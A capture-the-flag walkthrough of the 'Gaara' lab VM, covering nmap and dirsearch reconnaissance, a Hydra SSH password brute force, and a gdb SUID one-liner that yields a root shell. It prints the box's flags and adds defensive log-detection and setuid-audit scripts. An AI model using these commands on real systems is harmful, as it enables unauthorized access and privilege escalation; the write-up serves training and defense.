Information Gathering

Note: just import the .ova directly into VMware.

  • First, check the Kali IP address:
root at kali in ~/Gaara 
$ ip --color address
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:36:e9:5d brd ff:ff:ff:ff:ff:ff
inet 10.10.8.17/24 brd 10.10.8.255 scope global dynamic noprefixroute eth0
valid_lft 1654sec preferred_lft 1654sec
inet6 fe80::fff8:80c4:4cdf:a014/64 scope link noprefixroute
valid_lft forever preferred_lft forever

Host Discovery

  • Use Nmap to discover the target; one IP shows up: 10.10.8.23
root at kali in ~/Gaara 
$ nmap -sn --min-rate 10000 10.10.8.0/24 -oN nmap_ip.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-20 10:51 CST
Nmap scan report for 10.10.8.1
Host is up (0.00011s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.8.2
Host is up (0.000099s latency).
MAC Address: 00:50:56:EA:61:D3 (VMware)
Nmap scan report for 10.10.8.23
Host is up (0.000063s latency).
MAC Address: 00:0C:29:2B:59:D5 (VMware)
Nmap scan report for 10.10.8.254
Host is up (0.000047s latency).
MAC Address: 00:50:56:E5:23:AF (VMware)
Nmap scan report for 10.10.8.17
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 0.32 seconds

Port Scanning

  • Scan for open ports:
root at kali in ~/Gaara 
$ nmap -p- -sC -T4 --min-rate 10000 10.10.8.23 -oN nmap_port.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-20 10:51 CST
Nmap scan report for 10.10.8.23
Host is up (0.000033s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
| ssh-hostkey:
| 2048 3e:a3:6f:64:03:33:1e:76:f8:e4:98:fe:be:e9:8e:58 (RSA)
| 256 6c:0e:b5:00:e7:42:44:48:65:ef:fe:d7:7c:e6:64:d5 (ECDSA)
|_ 256 b7:51:f2:f9:85:57:66:a8:65:54:2e:05:f9:40:d2:f4 (ED25519)
80/tcp open http
|_http-title: Gaara
MAC Address: 00:0C:29:2B:59:D5 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.11 seconds

Service Identification

  • Identify the services behind the open ports:
root at kali in ~/Gaara 
$ nmap -p22,80 -sV -O -A -sC -T4 --min-rate 10000 10.10.8.23 -oN nmap_server.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-20 10:52 CST
Nmap scan report for 10.10.8.23
Host is up (0.00043s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 3e:a3:6f:64:03:33:1e:76:f8:e4:98:fe:be:e9:8e:58 (RSA)
| 256 6c:0e:b5:00:e7:42:44:48:65:ef:fe:d7:7c:e6:64:d5 (ECDSA)
|_ 256 b7:51:f2:f9:85:57:66:a8:65:54:2e:05:f9:40:d2:f4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Gaara
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:2B:59:D5 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.43 ms 10.10.8.23

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.74 seconds

Vulnerability Scanning

  • Run an Nmap vulnerability scan:
root at kali in ~/Gaara 
$ nmap --script=vuln -T4 --min-rate 10000 10.10.8.23 -oN nmap_vuln.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-20 10:52 CST
Nmap scan report for 10.10.8.23
Host is up (0.000032s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
MAC Address: 00:0C:29:2B:59:D5 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 31.67 seconds
  • Looked over the reported findings; none of them is useful.

Directory Scanning

root at kali in ~/Gaara 
$ dirsearch -u http://10.10.8.23 -o $PWD/dirsearch.txt

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/Gaara/dirsearch.txt

Error Log: /root/.dirsearch/logs/errors-24-06-20_10-52-57.log

Target: http://10.10.8.23/

[10:52:57] Starting:
[10:52:58] 403 - 275B - /.ht_wsr.txt
[10:52:58] 403 - 275B - /.htaccess.bak1
......

root at kali in ~/Gaara
$ cat dirsearch.txt | grep 200
200 288B http://10.10.8.23:80/index.html

Exploitation

  • Visiting each of the discovered paths in turn, it is clearly a custom-built site:

[screenshot]

  • Port 80 serves nothing but a single image, and it does not even load.

Directory Scanning v2

  • Since too little information has been collected so far, try a different wordlist:

Note: honestly, this directory is not in any of the usual wordlists.

root at kali in ~/Gaara 
$ dirsearch -u http://10.10.8.23 -o $PWD/dirsearch.txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 220545

Output File: /root/Gaara/dirsearch.txt

Error Log: /root/.dirsearch/logs/errors-24-06-20_10-58-09.log

Target: http://10.10.8.23/

[10:58:09] Starting:
[11:00:05] 403 - 275B - /server-status
[11:03:52] 200 - 327B - /Cryoserver

Task Completed
  • A Cryoserver directory turns up; visit it:

[screenshot]

Information Disclosure

  • Scrolling down reveals three directories; look at each in turn:

[screenshots]

  • iamGaara differs somewhat from the other two; on closer inspection there is an unusual string: f1MgN9mTf9SNbzRygcU

[screenshot]

  • This is starting to feel like a CTF; decode it with CyberChef:

[screenshot]

SSH Brute Force

  • This yields a username, gaara. Combined with port 22 found in the earlier port scan, an SSH password brute force can be attempted:
root at kali in ~/Gaara 
$ hydra -l gaara -P /usr/share/wordlists/rockyou.txt ssh://10.10.8.23
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-06-20 11:22:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.8.23:22/
[STATUS] 166.00 tries/min, 166 tries in 00:01h, 14344234 to do in 1440:12h, 15 active
[22][ssh] host: 10.10.8.23 login: gaara password: iloveyou2
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-06-20 11:24:23
  • Hydra recovers the password: iloveyou2
  • With a username and password in hand, connect over SSH:
root at kali in ~/Gaara 
$ ssh gaara@10.10.8.23
The authenticity of host '10.10.8.23 (10.10.8.23)' can't be established.
ED25519 key fingerprint is SHA256:XpX1VX2RtX8OaktJHdq89ZkpLlYvr88cebZ0tPZMI0I.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.8.23' (ED25519) to the list of known hosts.
gaara@10.10.8.23's password:
Linux Gaara 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Feb 3 00:14:55 2022 from 192.168.220.1
gaara@Gaara:~$ id
uid=1001(gaara) gid=1001(gaara) groups=1001(gaara)
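From the defender's side, the Hydra run above is anything but quiet: each guess is a "Failed password" line from the same source in sshd's syslog output, followed by an "Accepted password" once the wordlist hits. The following added example (not part of the original write-up) parses auth.log-style lines and flags a source that produces a burst of failures inside a short window, noting whether a successful login followed the burst. The log lines are constructed to resemble what the attack in the text would leave on the target; the hostname, PIDs, ports and timestamps are made up.

```python
"""Detect SSH password-guessing bursts in sshd auth logs (OpenSSH syslog format).

Added example, not part of the original write-up. SAMPLE_AUTH_LOG is constructed
to look like the target's /var/log/auth.log during the Hydra run described in
the text; hostname, PIDs, ports and timestamps are invented.
"""
import re
from collections import defaultdict
from datetime import datetime

# "Failed password" / "Accepted password" events as sshd writes them via syslog.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)


def parse_auth_log(lines, year=2024):
    """Yield (timestamp, result, user, ip) for password-auth events; skip other lines."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # disconnects, key auth, pam chatter etc. are not of interest here
        # syslog timestamps carry no year, so the caller supplies it
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        yield ts, m["result"], m["user"], m["ip"]


def find_bruteforce(lines, window_seconds=60, threshold=10):
    """Return {ip: finding} for every source with >= threshold failed logins in any
    sliding window of window_seconds; also record whether a success followed."""
    events = sorted(parse_auth_log(lines))  # chronological order
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev[3]].append(ev)

    findings = {}
    for ip, evs in by_ip.items():
        failures = [ts for ts, result, _, _ in evs if result == "Failed"]
        peak, start = 0, 0
        for end in range(len(failures)):
            # shrink the window from the left until it spans <= window_seconds
            while (failures[end] - failures[start]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            findings[ip] = {
                "peak_failures": peak,
                "users": sorted({u for _, _, u, _ in evs}),
                # a success after a burst is the signal that the guessing worked
                "success_after_burst": any(
                    result == "Accepted" and ts >= failures[0] for ts, result, _, _ in evs
                ),
            }
    return findings


# Constructed sample: twelve guesses for "gaara" within 12 seconds from one source,
# one stray failure from another host, and the eventual successful login.
SAMPLE_AUTH_LOG = [
    f"Jun 20 11:22:{42 + i:02d} Gaara sshd[{1200 + i}]: Failed password for gaara "
    f"from 10.10.8.17 port {40000 + i} ssh2"
    for i in range(12)
] + [
    "Jun 20 11:23:01 Gaara sshd[1300]: Failed password for invalid user admin from 10.10.8.99 port 50001 ssh2",
    "Jun 20 11:23:05 Gaara sshd[1300]: Connection closed by 10.10.8.99 port 50001 [preauth]",
    "Jun 20 11:24:20 Gaara sshd[1350]: Accepted password for gaara from 10.10.8.17 port 40100 ssh2",
]

if __name__ == "__main__":
    for ip, finding in find_bruteforce(SAMPLE_AUTH_LOG).items():
        print(ip, finding)
```

The threshold and window are deliberately coarse; a real deployment would feed the same signal into fail2ban or an equivalent, and the cleaner fix is to stop the guessing from being possible at all (`PasswordAuthentication no` plus key-based login, or at least a low `MaxAuthTries`, in sshd_config).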
  • Look for anything useful; there is a flag in the current directory:
gaara@Gaara:~$ ls -al
total 36
drwxr-xr-x 3 gaara gaara 4096 Dec 13 2020 .
drwxr-xr-x 3 root root 4096 Dec 13 2020 ..
lrwxrwxrwx 1 root root 9 Dec 13 2020 .bash_history -> /dev/null
-rw-r--r-- 1 gaara gaara 220 Dec 13 2020 .bash_logout
-rw-r--r-- 1 gaara gaara 3526 Dec 13 2020 .bashrc
-rw-r--r-- 1 gaara gaara 33 Dec 13 2020 flag.txt
-rw-r--r-- 1 gaara gaara 57 Dec 13 2020 Kazekage.txt
drwxr-xr-x 3 gaara gaara 4096 Dec 13 2020 .local
-rw-r--r-- 1 gaara gaara 807 Dec 13 2020 .profile
-rw------- 1 gaara gaara 102 Dec 13 2020 .Xauthority
gaara@Gaara:~$ cat flag.txt
5451d3eb27acb16c652277d30945ab1e
  • Besides the flag there is another file; check its contents:
gaara@Gaara:~$ cat Kazekage.txt 
You can find Kazekage here....

L3Vzci9sb2NhbC9nYW1lcw==
  • It looks like Base64; decode it:
gaara@Gaara:~$ echo 'L3Vzci9sb2NhbC9nYW1lcw==' | base64 -d
/usr/local/games
  • This points to the /usr/local/games directory; go in and have a look:
gaara@Gaara:~$ cd /usr/local/games
gaara@Gaara:/usr/local/games$ ls -al
total 12
-rw-r--r-- 1 gaara gaara 0 Feb 3 2022 +
-rw-r--r-- 1 gaara gaara 0 Feb 3 2022 +++
-rw-r--r-- 1 gaara gaara 0 Feb 3 2022 ++++
-rw-r--r-- 1 gaara gaara 0 Feb 3 2022 +++++
-rw-r--r-- 1 gaara gaara 0 Feb 3 2022 --
-rw-r--r-- 1 gaara gaara 0 Feb 3 2022 ---
-rw-r--r-- 1 gaara gaara 0 Feb 3 2022 ----
drwx------ 2 gaara gaara 4096 Feb 3 2022 .
drwxr-xr-x 10 root root 4096 Dec 13 2020 ..
-rw-r--r-- 1 gaara gaara 1505 Dec 13 2020 .supersecret.txt
  • There is a .supersecret.txt file; take a look:
gaara@Gaara:/usr/local/games$ cat .supersecret.txt 

Godaime Kazekage:

+++++ +++[- >++++ ++++< ]>+++ +.<++ ++++[ ->+++ +++<] >+.-- ---.< +++++
+++[- >---- ----< ]>--- -.<++ +++++ ++[-> +++++ ++++< ]>+++ +++++ .<+++
[->-- -<]>- .++++ ++.<+ +++++ +++[- >---- ----- <]>-- --.<+ +++++ +++[-
>++++ +++++ <]>+. <+++[ ->--- <]>-- --.-- --.<+ ++[-> +++<] >++.. <+++[
->+++ <]>++ ++.<+ +++++ +++[- >---- ----- <]>-- ----- -.<++ +++++ ++[->
+++++ ++++< ]>+++ .<+++ [->-- -<]>- --.+. +++++ .---. <++++ ++++[ ->---
----- <]>-- ----- ----. <++++ +++++ [->++ +++++ ++<]> +++++ +++.< +++[-
>---< ]>-.+ +++++ .<+++ +++++ +[->- ----- ---<] >---- .<+++ +++++ [->++
+++++ +<]>+ ++.<+ ++[-> +++<] >+++. +++++ +.--- ----- -.--- ----- .<+++
+++++ [->-- ----- -<]>- ---.< +++++ +++[- >++++ ++++< ]>+++ +++.+ ++.++
+++.< +++[- >---< ]>-.< +++++ +++[- >---- ----< ]>--- -.<++ +++++ ++[->
+++++ ++++< ]>++. ----. --.-- ----- -.<++ +[->+ ++<]> +++++ +.<++ +[->-
--<]> ---.+ .++++ +.--- ----. <++++ ++++[ ->--- ----- <]>-- ----- .<+++
+++++ +[->+ +++++ +++<] >+++. <+++[ ->--- <]>-- -.--- ----. <++++ [->++
++<]> +++.< +++++ ++++[ ->--- ----- -<]>- --.<+ +++++ ++[-> +++++ +++<]
>++++ +.--- -.<++ ++[-> ++++< ]>++. <+++[ ->--- <]>-. +++.< +++[- >+++<
]>+++ +.<++ +++++ [->-- ----- <]>-- ----- --.<+ ++++[ ->--- --<]> -----
-.<++ +++++ [->++ +++++ <]>++ +.<++ +++[- >++++ +<]>+ ++++. +++++ ++.<+
+++++ +++[- >---- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >++++ .<+++
++[-> +++++ <]>.< ++++[ ->+++ +<]>+ .<+++ [->-- -<]>- ----. +.<++ +[->+
++<]> ++++. <++++ +++++ [->-- ----- --<]> .<
  • Obviously brainfuck; decode it and see:

[screenshot]

  • Went around in a circle only to be fooled…

SUID Privilege Escalation

  • Check which users on the system have a usable login shell:
gaara@Gaara:/usr/local/games$ cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
gaara:x:1001:1001:,,,:/home/gaara:/bin/bash
  • Check whether sudo offers a privilege-escalation path:
gaara@Gaara:/usr/local/games$ sudo -l
sudo: unable to resolve host Gaara: Name or service not known
[sudo] password for gaara:
Sorry, user gaara may not run sudo on Gaara.
  • Check for SUID files:
gaara@Gaara:/usr/local/games$ find / -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/gdb
/usr/bin/sudo
/usr/bin/gimp-2.10
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/passwd
/usr/bin/mount
/usr/bin/umount
  • gdb stands out. GDB (the GNU Debugger) on Linux is a powerful command-line debugger for C and C++ programs.
  • Check GTFOBins for an SUID privilege-escalation route:

[screenshot]

  • There is one! Run it directly:
gaara@Gaara:/usr/local/games$ /usr/bin/gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
GNU gdb (Debian 8.2.1-2+b3) 8.2.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word".
# id
uid=1001(gaara) gid=1001(gaara) euid=0(root) egid=0(root) groups=0(root),1001(gaara)
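The root cause here is not gdb itself but a setuid bit that a stock install never sets: the `find / -perm -4000` listing contains two entries (gdb and gimp) that no Debian package ships setuid. The added example below (not from the original write-up) turns that observation into a repeatable check: it diffs a `find` listing against an expected baseline and tags unexpected entries whose basename is a program that can execute arbitrary code, which is exactly the class GTFOBins catalogues. The baseline and the "shell-capable" list are constructed assumptions for this box, not authoritative package data; the listing is the one from the text.

```python
"""Audit a `find / -perm -4000` listing against an expected setuid baseline.

Added example, not part of the original write-up. EXPECTED_SUID is a constructed
allow-list of setuid-root helpers that a minimal Debian 10 install is assumed to
ship; SHELL_CAPABLE is an assumed triage list of programs that can run arbitrary
code (the kind GTFOBins documents), not an exhaustive catalogue.
"""
import os

# Assumed baseline for this host: setuid helpers that normal packages install.
EXPECTED_SUID = {
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd",
    "/usr/bin/newgrp", "/usr/bin/su", "/usr/bin/passwd",
    "/usr/bin/mount", "/usr/bin/umount",
}

# Assumed triage list: basenames that can spawn a shell or run code when setuid.
SHELL_CAPABLE = {
    "gdb", "gimp-2.10", "python", "python3", "perl", "vim", "vi",
    "find", "bash", "sh", "nmap", "env", "awk",
}


def audit_suid_listing(listing_text, baseline=EXPECTED_SUID, risky=SHELL_CAPABLE):
    """Split a find listing into expected / unexpected, and tag unexpected entries
    whose basename is a shell-capable program as risky."""
    paths = {line.strip() for line in listing_text.splitlines() if line.strip()}
    unexpected = sorted(paths - baseline)
    return {
        "unexpected": unexpected,
        "risky": [p for p in unexpected if os.path.basename(p) in risky],
        # entries in the baseline but absent from the host; useful for spotting
        # a stale baseline rather than a problem on the host
        "missing_from_baseline": sorted(baseline - paths),
    }


def remediation_commands(audit):
    """Commands an administrator would run to strip the setuid bit from risky extras."""
    return [f"chmod u-s {path}" for path in audit["risky"]]


# The listing from the write-up (output of `find / -perm -4000 2>/dev/null` on the box).
FIND_OUTPUT_FROM_WRITEUP = """
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/gdb
/usr/bin/sudo
/usr/bin/gimp-2.10
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/passwd
/usr/bin/mount
/usr/bin/umount
"""

if __name__ == "__main__":
    result = audit_suid_listing(FIND_OUTPUT_FROM_WRITEUP)
    print("unexpected:", result["unexpected"])
    print("risky:", result["risky"])
    for cmd in remediation_commands(result):
        print(cmd)
```

In practice the baseline would come from a known-good image or from package metadata rather than a hand-written set, and the check would run from a cron job or a configuration-management agent so that a newly added setuid binary is noticed before someone finds it with GTFOBins.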
  • Privilege escalation succeeded; find the flag:
# cd /root
# ls -al
total 24
drwx------ 3 root root 4096 Dec 13 2020 .
drwxr-xr-x 18 root root 4096 Dec 13 2020 ..
lrwxrwxrwx 1 root root 9 Dec 13 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4096 Dec 13 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 803 Dec 13 2020 root.txt
# cat root.txt


██████╗ █████╗ █████╗ ██████╗ █████╗
██╔════╝ ██╔══██╗██╔══██╗██╔══██╗██╔══██╗
██║ ███╗███████║███████║██████╔╝███████║
██║ ██║██╔══██║██╔══██║██╔══██╗██╔══██║
╚██████╔╝██║ ██║██║ ██║██║ ██║██║ ██║
╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝

8a763d61f71db8e7aa237055de928d86

Congrats You have Rooted Gaara.

Give the feedback on Twitter if you Root this : @0xJin